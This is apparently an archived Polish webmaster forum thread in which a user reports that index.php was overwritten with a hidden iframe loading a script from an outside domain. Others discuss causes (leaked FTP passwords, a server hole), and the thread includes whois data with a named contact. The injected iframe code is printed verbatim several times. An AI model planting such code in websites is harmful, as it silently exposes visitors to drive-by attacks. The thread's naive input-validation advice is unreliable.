Otórz wczoraj wszedłem na swoją stonę i zauważyłem że nie chce się załadować, sprawdziłem więc index.php Okazało się że jego zawartość została skasowana a na jej miejsce wpisany został kod html z niewidocznym iframe prowadzącym do http://golden-corps.com/script.php Na szczęście budowa mojego skryptu zapobiegła większym stratom. Odnowiłem index.php i od tego czasu jak na razie nic się nie zmieniło.
Moja witryna leży na http://www.gno-cms.yoyo.pl
Skrypt cały czas w budowie więc okno które się wyświetliło jest non stop. Czy ktoś może sprawdzić czy może zastosowano jakąś technike mniej mi znaną, bo sporo już w tym siedze i myślałem że wystarczająco zabezpieczyłem kod.
Pełna wersja: Czy strona jest dziurawa czy tylko moja pomyłka?
Jeżeli dzieją się takie cuda, niekoniecznie jest to przyczyną dziury w skrypcie (który chyba nie jest aż tak skomplikowany, by modyfikować pliki?). Bardziej prawdopodobne jest to, że masz wirusa bądź używasz jakiegoś pirackiego programu do uploadu plików na ftp, który wysyła Twoje hasła w niewłaściwe miejsca...
Nie wiem może to tylko przypadek. W każdym razie do filtrowania forma użyłem coś takiego:
Chyba troche nadmiar ale raczej nie da sie nic zrobić w stylu SQL injectio prawda?
Aaa i jeszcze jedno. Do walidacji postów na forum wystarczy użyć addshlashes()? Znalazłem też funkcje urldecode(), oraz urlencode() Może sie przydać taka funkcja do zabezpieczenia?
CODE
IF(strlen($_POST['login'])>6 && strlen($_POST['login'])<15 &&
strlen($_POST['pass'])<15 && preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['login'])
&& preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['pass'])) {
strlen($_POST['pass'])<15 && preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['login'])
&& preg_match("/^[0-9A-Za-z_-]{6,15}$/", $_POST['pass'])) {
Chyba troche nadmiar ale raczej nie da sie nic zrobić w stylu SQL injectio prawda?
Aaa i jeszcze jedno. Do walidacji postów na forum wystarczy użyć addshlashes()? Znalazłem też funkcje urldecode(), oraz urlencode() Może sie przydać taka funkcja do zabezpieczenia?
Kiedyś słyszałem o podobnym przypadku, ale w nim nie kasowana była zawartość index, ale na końcu "doklejana" niewidoczna ramka. Była to wina serwera, a dokładniej dziura w CPanelu. Być może tutaj jest podobnie.
I znowu to samo. Tym razem na inną moją strone. Inne hasło a i ostatni raz ją modyfikowałem miesiąc temu i od tamtej pory tylko wchodziłem z przeglądarki więc to raczej wina albo serwera albo jakiegoś dobrego hackera bo więcej możliwości nie widze. Jeżeli serwera to yoyo.pl ma niezły problem :/ Tym razem mam kod który został zamieszczony. Tak jak ostatnio index.php został do cna wyczyszczony a zapisano do niego:
<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
CODE
<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<!--iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe-->
<iframe name="StatPage" src="http://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
Podobne włamanie (?) jest opisane tutaj - http://forum.pirotechnika.one.pl/viewtopic.php?p=139940 .
Może znajdziesz podobieństwa z włamaniem na Twoją stronę.
[EDIT]
Kolejne strony z podobnymi włamaniami: [patrz zrodlo]
http://www.eko-elw.pl/
http://www.pqn.pl/baranow-sandomierski/
http://64.233.183.104/search?q=cache:JhEFj...lient=firefox-a
Wygląda na to ze nie jest to włamanie wymierzone konkretnie w Ciebie, mi to wygląda na masówkę polegającą na dopisaniu kodu html w plikach takich jak index.html / index.php etc. Może zmień klienta ftp? BTW. Sprawdzałeś logi? - to powinno wyjaśnić czy ktoś przechwycił hasło do ftp, czy włamał się przez stronę www.
Może znajdziesz podobieństwa z włamaniem na Twoją stronę.
[EDIT]
Kolejne strony z podobnymi włamaniami: [patrz zrodlo]
http://www.eko-elw.pl/
http://www.pqn.pl/baranow-sandomierski/
http://64.233.183.104/search?q=cache:JhEFj...lient=firefox-a
Wygląda na to ze nie jest to włamanie wymierzone konkretnie w Ciebie, mi to wygląda na masówkę polegającą na dopisaniu kodu html w plikach takich jak index.html / index.php etc. Może zmień klienta ftp? BTW. Sprawdzałeś logi? - to powinno wyjaśnić czy ktoś przechwycił hasło do ftp, czy włamał się przez stronę www.
No właśnie widze. Sprawdziłem logi i rzeczywiście coś/ktoś się logował. Lecz bardziej mi to wygląda na robote bota niż hackera. 0 zabezpieczeń, IP osoby bez problemy namierzyłem, do tego stałe 
Tylko ciekaw jestem tego że jak już sie logował to 2x nieudane i dopiero za 3 razem udane :/ Zostawie wiadomość dla tego IP
inetnum: 89.201.164.0 - 89.201.164.255
netname: PlusHosting
descr: Plus Hosting
descr: Istarska 36
descr: 52100 Pula
country: HR
admin-c: ZG232-RIPE
tech-c: ZG232-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
mnt-by: OT-MNT
source: RIPE # Filtered
person: Zvonimir Gembec
address: Plus Hosting
address: 52100 Pula
address: Croatia
abuse-mailbox: http://www.domaintools.com/registrant-sear...5acd0ffebfa8b7e
phone: +385 52 380 870
fax-no: +385 52 210 685
mnt-by: OT-MNT
nic-hdl: ZG232-RIPE
source: RIPE # Filtered
route: 89.201.128.0/17
descr: OT - Optima Telekom d.o.o.
origin: AS34594
mnt-by: OT-MNT
source: RIPE # Filtered
Tylko ciekaw jestem tego że jak już sie logował to 2x nieudane i dopiero za 3 razem udane :/ Zostawie wiadomość dla tego IP inetnum: 89.201.164.0 - 89.201.164.255
netname: PlusHosting
descr: Plus Hosting
descr: Istarska 36
descr: 52100 Pula
country: HR
admin-c: ZG232-RIPE
tech-c: ZG232-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
mnt-by: OT-MNT
source: RIPE # Filtered
person: Zvonimir Gembec
address: Plus Hosting
address: 52100 Pula
address: Croatia
abuse-mailbox: http://www.domaintools.com/registrant-sear...5acd0ffebfa8b7e
phone: +385 52 380 870
fax-no: +385 52 210 685
mnt-by: OT-MNT
nic-hdl: ZG232-RIPE
source: RIPE # Filtered
route: 89.201.128.0/17
descr: OT - Optima Telekom d.o.o.
origin: AS34594
mnt-by: OT-MNT
source: RIPE # Filtered
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.